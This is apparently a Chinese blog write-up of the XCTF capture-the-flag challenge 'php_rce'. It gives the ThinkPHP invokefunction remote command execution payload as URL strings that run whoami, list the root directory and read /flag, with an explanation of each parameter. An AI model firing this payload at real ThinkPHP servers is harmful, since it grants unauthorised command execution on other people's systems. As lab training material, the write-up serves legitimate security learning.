88.[4]攻防世界 web php_rce

之前做过,回顾(看了眼之前的wp,跟没做过一样)

属于远程命令执行漏洞

在 PHP 里,system()exec()shell_exec()、反引号(`)等都可用于执行系统命令。

直接访问index.php没效果

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  • s=index/think\app/invokefunction :这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的 invokefunction 方法。
  • function=call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
  • vars[0]=system :这里将 system 作为要调用的函数名。system 是 PHP 中用于执行系统命令的函数。
  • vars[1][]=whoami :这是传递给 system 函数的参数,也就是要执行的系统命令。whoami 命令的作用是显示当前系统用户的名称。
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

ls / 用于列出根目录(/)下的所有文件和文件夹。

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

cat 用于查看文件内容。

相关推荐
WHOAMI_老猫37 分钟前
xss注入遇到转义,html编码绕过了解一哈
javascript·web安全·渗透测试·xss·漏洞原理
开开心心就好7 小时前
高效账号信息管理工具,可安全随机生成密码
javascript·安全·docker·智能手机·pdf·word·excel
上海云盾-高防顾问8 小时前
云安全与网络安全:核心区别与协同作用解析
安全·web安全
枷锁—sha8 小时前
【DVWA系列】——xss(DOM)——High详细教程
前端·web安全·网络安全·xss
电院工程师9 小时前
轻量级密码算法PRESENT的C语言实现(无第三方库)
c语言·算法·安全·密码学
gaog2zh9 小时前
010502管道符_防火墙出入站_不回显带外-渗透命令-基础入门-网络安全
web安全·不回显带外·管道符·防火墙出入站
Guheyunyi11 小时前
AI集成运维管理平台的架构与核心构成解析
大数据·运维·人工智能·科技·安全·架构
领世达检测V1335290924913 小时前
智能门锁申请 EN 18031 欧盟网络安全认证指南
网络·安全
嘉里蓝海13 小时前
危险品运输行业观察
安全·物流